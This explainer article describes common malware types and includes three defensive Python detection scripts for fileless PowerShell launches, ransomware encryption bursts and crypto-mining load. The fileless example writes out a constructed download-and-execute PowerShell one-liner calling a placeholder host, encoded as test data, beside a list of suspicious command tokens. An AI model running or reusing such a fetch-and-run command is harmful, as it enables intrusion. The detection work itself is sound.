What is malware?
April 26th, 2017
Malware (short for malicious software) is an umbrella term for software designed to disrupt, damage or gain unauthorised access to a computer system without the knowledge or consent of its owner. Malware can compromise computer functions, steal data, bypass access controls and cause other types of harm.
A piece of malware is usually categorised into one of several types, based on the creator's intent and the form the malware takes: executable code, a script, active content in a document or web page, or other software. The categories overlap in practice; a single sample can be a Trojan that installs a rootkit and then joins a botnet.
What are the most common forms of malware?
Adware
Short for advertising-supported software. Adware is software which delivers unwanted advertisements to a user's machine, as pop-ups, adverts injected into websites or on-screen messages.
Most adware is sponsored or authored by advertisers and serves as a revenue-generating tool. Some adware also bundles spyware, which increases its danger by allowing it to track user activity and steal information.
Bots
Bots are programs created to perform actions automatically. Many bots are benign (search-engine crawlers, for example), but malicious use is increasingly common. Malicious bots are used for a range of activities including:
- Forming botnets used for DDoS attacks;
- Acting as spambots that post spam or fraudulent advertisements on websites; and
- Acting as web spiders which scrape information or distribute malware.
Bugs
A bug is a flaw in a piece of software which produces an undesired outcome. Bugs are not malware in themselves, but attackers exploit them to bypass conventional protections, and much malware spreads by exploiting them.
Bugs vary in severity. Minor bugs have a small impact on usability and often go unnoticed for long periods. Major bugs have a greater impact and cause problems such as freezing or crashing. Security bugs (vulnerabilities) are the most severe: they allow an attacker to bypass authentication, escalate privileges or steal data.
Bugs are typically the result of human error when writing a program's source code. For software in active development, bugs are addressed in patches once a fix has been created.
Patching is the primary way to close a vulnerability, so having a patch management strategy in place helps ensure your software is kept up to date and known vulnerabilities are closed before they can be exploited. Where a patch is not yet available, vendor-published mitigations or workarounds can reduce exposure in the meantime.
Worms
Computer worms are one of the oldest and most widespread forms of malware. They spread across networks without user interaction, typically by exploiting vulnerabilities in the operating system or in exposed network services, and cause harm in themselves by consuming bandwidth and overloading servers.
A worm can also carry a payload which it delivers to each infected machine. Payloads are pieces of code which run upon infection and perform specific actions, such as data theft, file deletion or enrolling the machine in a botnet.
Crypto-jacking
Crypto-jacking is malware which steals an infected computer's processing power. The hijacked processing is used to mine crypto-currencies such as Bitcoin, Monero or Ethereum for the attacker's benefit, without the owner's consent.
Crypto-jacking is most profitable when it stays undetected for a long period, so its authors design it to have a smaller footprint than most malware. Often the only sign of infection is reduced performance, and because so many other things can cause that, crypto-jacking is difficult to spot from symptoms alone.
By staying undetected, crypto-jacking also wears hardware down: machines kept permanently under full load run hotter and degrade faster. The result is damaged hardware, lower employee productivity and higher electricity bills.
Fileless malware
A fileless infection is one where the malicious code runs directly in memory instead of being written to the target computer's hard drive as a file. It is typically launched by abusing legitimate tools already on the system, such as PowerShell or WMI, and persists through mechanisms like registry entries or scheduled tasks rather than through a malicious executable on disk.
Fileless malware is a serious problem because it defeats file-signature scanning: without a malicious file on disk there is no file hash or byte pattern to match.
Signature scanning is still the core of most anti-malware products, so fileless malware frequently goes unnoticed. It can still be caught, but only by tools which inspect process behaviour, command lines and memory rather than files.
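As an added example (not code from the original article), the script below contrasts the two approaches on constructed data: a file-hash lookup, which is what a signature scanner does, and a check of the command line a process was started with, which still exists when the only artefact is an in-memory PowerShell script. The signature set, the stand-in binaries and the encoded command are all constructed for this illustration, and the token list is a small assumed subset of what a real behavioural engine would look for.

```python
import base64
import hashlib
import re
from typing import List, Optional

# Constructed stand-in for a vendor signature database: SHA-256 of one "known bad" dropper.
KNOWN_BAD_BYTES = b"MZ\x90\x00 constructed dropper body used only for this example"
SIGNATURE_DB = {hashlib.sha256(KNOWN_BAD_BYTES).hexdigest()}

# Constructed stand-in for the bytes of a legitimate, signed powershell.exe on disk.
LEGIT_HOST_BYTES = b"MZ\x90\x00 constructed legitimate powershell.exe body"

# Assumed subset of command-line indicators a behavioural engine would weight.
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "frombase64string",
    "-w hidden", "-windowstyle hidden", "-nop", "-ep bypass",
)

# Matches the -EncodedCommand / -enc / -ec / -e switch and captures its base64 argument.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def file_signature_hit(content: bytes) -> bool:
    """Signature scanning: hash the file on disk and look the hash up."""
    return hashlib.sha256(content).hexdigest() in SIGNATURE_DB


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind powershell -EncodedCommand (base64 of UTF-16LE text)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def behavioural_flags(cmdline: str) -> List[str]:
    """Behavioural check: inspect what the process was asked to do, which exists
    even when no malicious file does. A decoded -enc payload is inspected too."""
    decoded = decode_encoded_command(cmdline)
    # Strip the base64 blob so random base64 characters cannot spell a token by accident.
    text = ENC_RE.sub(" ", cmdline)
    if decoded is not None:
        text += " " + decoded
    low = text.lower()
    flags = [tok for tok in SUSPICIOUS_TOKENS if tok in low]
    if decoded is not None:
        flags.append("encoded-command")
    return flags


def verdict(file_bytes: bytes, cmdline: str) -> str:
    """Combine both checks the way an endpoint agent would."""
    if file_signature_hit(file_bytes):
        return "signature"
    if behavioural_flags(cmdline):
        return "behaviour"
    return "clean"


# Constructed fileless launch: a download-and-execute one-liner hidden behind -enc.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")
FILELESS_CMDLINE = f"powershell.exe -nop -w hidden -enc {ENCODED}"
BENIGN_CMDLINE = r"notepad.exe C:\Users\alice\notes.txt"

if __name__ == "__main__":
    print("dropper on disk :", verdict(KNOWN_BAD_BYTES, "dropper.exe"))
    print("fileless launch :", verdict(LEGIT_HOST_BYTES, FILELESS_CMDLINE))
    print("  decoded       :", decode_encoded_command(FILELESS_CMDLINE))
    print("  flags         :", behavioural_flags(FILELESS_CMDLINE))
    print("notepad         :", verdict(LEGIT_HOST_BYTES, BENIGN_CMDLINE))
```

The fileless launch runs a genuine, unmodified powershell.exe, so its hash never appears in any signature set; the only thing that gives it away is the command line and the script it decodes to. Real engines extend this with parent-process relationships, script-block logging and memory scanning, but the principle is the same: look at behaviour, not just files.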
Keyloggers
A keylogger is surveillance software which records the keystrokes a user makes, capturing passwords, bank details and personal information as they are typed.
The recorded information is then sent back to the attacker, who can use it to gain unauthorised access to systems or sell it on the dark web.
Ransomware
Ransomware is malware which restricts a user's access to their computer or data and then demands a ransom to restore it. Access is most commonly restricted by encrypting the user's files, but screen-locking overlays and other methods exist.
Once it has taken hold, ransomware displays threatening messages to pressure the user into paying, for example threatening to permanently delete all files if a sum of money is not paid within 24 hours.
Sometimes ransomware authors pose as security or law-enforcement bodies such as the police, GCHQ or the CIA, with a message claiming that access has been restricted because illegal material was found on the machine and asking the user to pay a 'fine' to restore access. This is still ransomware and is a scam.
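The file encryption described above is also what gives ransomware away on a host. As an added example that is not from the original article, the following script implements two checks that anti-ransomware tools use: the Shannon entropy of a file's new contents (encrypted data sits close to 8 bits per byte, ordinary documents far lower) and a sliding window counting how many high-entropy rewrites happen within a short period. The file events and their contents are constructed inline, and the thresholds are assumed starting points rather than measured values.

```python
import hashlib
import math
from collections import Counter
from typing import Dict, List, Tuple

ENTROPY_THRESHOLD = 7.5   # bits per byte; assumed cut-off, ciphertext sits near 8.0
WINDOW_SECONDS = 60.0     # assumed: how quickly a burst of rewrites must happen
MIN_FILES = 20            # assumed: high-entropy rewrites in one window that trip the alarm

FileEvent = Tuple[float, str, bytes]   # (unix timestamp, path, bytes written)


def shannon_entropy(data: bytes) -> float:
    """Bits of information per byte: 0.0 for empty or constant input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes) -> bool:
    return shannon_entropy(data) >= ENTROPY_THRESHOLD


def high_entropy_burst(events: List[FileEvent], window: float = WINDOW_SECONDS,
                       min_files: int = MIN_FILES) -> bool:
    """True if at least min_files distinct files received high-entropy contents
    within any span of window seconds."""
    first_hit: Dict[str, float] = {}
    for ts, path, data in sorted(events, key=lambda e: e[0]):
        if path not in first_hit and looks_encrypted(data):
            first_hit[path] = ts
    hits = sorted(first_hit.values())
    left = 0
    for right in range(len(hits)):
        while hits[right] - hits[left] > window:   # shrink window from the left
            left += 1
        if right - left + 1 >= min_files:
            return True
    return False


def pseudo_ciphertext(i: int, size: int = 4096) -> bytes:
    """Deterministic stand-in for encrypted output: a SHA-256 keystream, not a real cipher."""
    out = bytearray()
    k = 0
    while len(out) < size:
        out += hashlib.sha256(b"example-keystream-%d-%d" % (i, k)).digest()
        k += 1
    return bytes(out[:size])


PLAINTEXT = (b"Quarterly report: revenue grew in each region. Details follow.\n" * 70)[:4096]

# Constructed: 25 documents rewritten with ciphertext two seconds apart (a ransomware run).
RANSOM_RUN: List[FileEvent] = [
    (1000.0 + 2 * i, f"/home/alice/docs/report{i}.docx", pseudo_ciphertext(i)) for i in range(25)
]
# Constructed: the same 25 documents saved normally with readable contents.
NORMAL_SAVES: List[FileEvent] = [
    (1000.0 + 2 * i, f"/home/alice/docs/report{i}.docx", PLAINTEXT) for i in range(25)
]
# Constructed: five compressed archives written ten minutes apart (high entropy, but no burst).
ARCHIVE_SAVES: List[FileEvent] = [
    (1000.0 + 600 * i, f"/home/alice/backup{i}.zip", pseudo_ciphertext(100 + i)) for i in range(5)
]

if __name__ == "__main__":
    print(f"plaintext entropy : {shannon_entropy(PLAINTEXT):.2f} bits/byte")
    print(f"ciphertext entropy: {shannon_entropy(pseudo_ciphertext(0)):.2f} bits/byte")
    print("ransom run alarm  :", high_entropy_burst(RANSOM_RUN))
    print("normal saves alarm:", high_entropy_burst(NORMAL_SAVES))
    print("archive saves alarm:", high_entropy_burst(ARCHIVE_SAVES))
```

Entropy alone is not enough: compressed archives, images and already-encrypted containers are legitimately high-entropy, which is why the alarm also requires many files to change in a short burst. Production tools add canary files and watch for extension changes and ransom-note drops on top of this.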
Rootkits
A rootkit is malware designed to hide its own presence, and that of other malware, while giving an attacker privileged and usually remote control of a computer. This allows them to access files, change settings and install further malware without the user or security software noticing.
Rootkits are particularly dangerous because they open the floodgates for the attacker. Once installed, a rootkit lets them:
- Access files and programs
- Delete or add files and programs
- Disable security settings
- Steal sensitive data
- Change system configurations and software
- Install further malware
- Control the computer as part of a botnet
And a lot more. Once infected with a rootkit, a machine can become the staging post for further attacks and so represents a significant security risk. Because a rootkit subverts the operating system itself, the only reliable remedy is usually to rebuild the machine from a known-good image rather than trust a clean-up from within.
Scareware
Scareware is malware which tricks users into purchasing useless or harmful software. It takes the form of fake virus alerts, false software updates or sham malware-removal tools.
Scareware typically fabricates the appearance of a problem on the user's machine, for instance a browser pop-up styled as a system warning. This frightens the user into buying the scareware in the belief that it will fix the issue.
Once installed, the scareware may run 'scans' which 'detect' more 'threats' and press you to pay for their removal. Alternatively, its 'scans' may claim to 'fix' the 'problem' while actually installing more malware.
Spyware
Spyware is surveillance malware which monitors the actions of a user. Spyware is often more capable than a simple keylogger and can steal far more: it may monitor activity, collect keystrokes, harvest stored data, record screen sessions and more.
Trojans
Trojans are malware disguised as ordinary files or programs so that a user believes they are safe. Once downloaded and run, a Trojan executes its malicious payload and infects the computer. Unlike worms and viruses, Trojans do not spread by themselves; they rely on the user being tricked into running them.
As with a worm, the payload can perform different actions: stealing data, installing more malware, changing files, recording user activity or enrolling the computer in a botnet.
Viruses
A virus is malware which copies itself and spreads to other files and computers. Viruses usually attach themselves to legitimate programs and run when the host program is launched. They can also spread through script files, macro-enabled documents and cross-site scripting vulnerabilities in web applications.
All malware spreads and affects computers in different ways, but there are some common symptoms to look out for:
- Sustained near-100% CPU usage
- Slow computer or web browser speeds
- Problems connecting to networks
- Modified or deleted files
- Unwanted advertisements appearing on screen
- Strange files, programs or desktop icons
- Programs running, turning off or reconfiguring themselves
- Strange computer behaviour
- Emails sent without the user's knowledge
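The crypto-jacking section and the first symptom above both come down to the same observable: a process pinned at high CPU for a long time. Builds, video encoding and browser tabs also spike CPU, so the useful signal is how long the load is sustained, and, for miners specifically, whether the process talks to a mining pool. The script below is an added example, not from the original article; it runs a sustained-load check over constructed per-minute process samples and looks for the stratum URI scheme that pool clients use. The thresholds and the sample command lines are assumptions made for this illustration.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Sample(NamedTuple):
    minute: int        # minutes since monitoring started
    pid: int
    name: str
    cmdline: str
    cpu_pct: float     # share of all CPU time used by this process during that minute


HIGH_CPU = 85.0        # assumed threshold for "pegged"
MIN_SUSTAINED = 10     # assumed: consecutive minutes above threshold before it counts
# URI schemes miners use to reach pools; one in a command line is a strong signal on its own.
POOL_SCHEMES = ("stratum+tcp://", "stratum+ssl://")


def longest_high_cpu_run(samples: List[Sample], threshold: float = HIGH_CPU) -> Dict[int, int]:
    """For each pid, the longest run of consecutive minutes at or above threshold."""
    by_pid: Dict[int, List[Sample]] = defaultdict(list)
    for s in samples:
        by_pid[s.pid].append(s)
    runs: Dict[int, int] = {}
    for pid, seq in by_pid.items():
        seq.sort(key=lambda s: s.minute)
        best = run = 0
        prev = None
        for s in seq:
            if s.cpu_pct < threshold:
                run = 0                       # load dropped: the run is broken
            elif prev is not None and s.minute == prev + 1:
                run += 1                      # still pegged in the next minute
            else:
                run = 1                       # pegged, but a gap in samples: start again
            best = max(best, run)
            prev = s.minute
        runs[pid] = best
    return runs


def cryptojacking_suspects(samples: List[Sample], min_run: int = MIN_SUSTAINED) -> List[str]:
    """Flag processes pegged for min_run or more consecutive minutes; note a pool URI if present."""
    names = {s.pid: (s.name, s.cmdline) for s in samples}
    findings = []
    for pid, run in sorted(longest_high_cpu_run(samples).items()):
        if run < min_run:
            continue
        name, cmd = names[pid]
        reasons = [f"cpu>={HIGH_CPU:g}% for {run} consecutive minutes"]
        if any(scheme in cmd.lower() for scheme in POOL_SCHEMES):
            reasons.append("mining-pool URI in command line")
        findings.append(f"pid {pid} ({name}): " + "; ".join(reasons))
    return findings


# Constructed: 30 minutes of per-process samples for three processes.
CONSTRUCTED_SAMPLES: List[Sample] = []
for m in range(30):
    if m < 5:   # a compiler job: pegged for five minutes, then finished
        CONSTRUCTED_SAMPLES.append(Sample(m, 4242, "cc1", "cc1 -O2 main.c", 95.0))
    # a browser: busy, but never near the threshold
    CONSTRUCTED_SAMPLES.append(Sample(m, 31, "firefox", "firefox", 20.0 + (m % 21)))
    # an impostor named like a system process, pegged the whole time, with an assumed pool argument
    CONSTRUCTED_SAMPLES.append(Sample(m, 7777, "svchost.exe",
                                      "svchost.exe --url stratum+tcp://pool.example.invalid:3333",
                                      92.0 + (m % 6)))

if __name__ == "__main__":
    for line in cryptojacking_suspects(CONSTRUCTED_SAMPLES):
        print(line)
```

The compiler is excluded only because its run is shorter than MIN_SUSTAINED; lower the threshold and it is flagged too, which is the trade-off any CPU-based rule makes. On a real host the samples would come from a metrics agent rather than a list, and a miner hiding behind a renamed binary is still caught by the load pattern even when it has no pool URI on its command line.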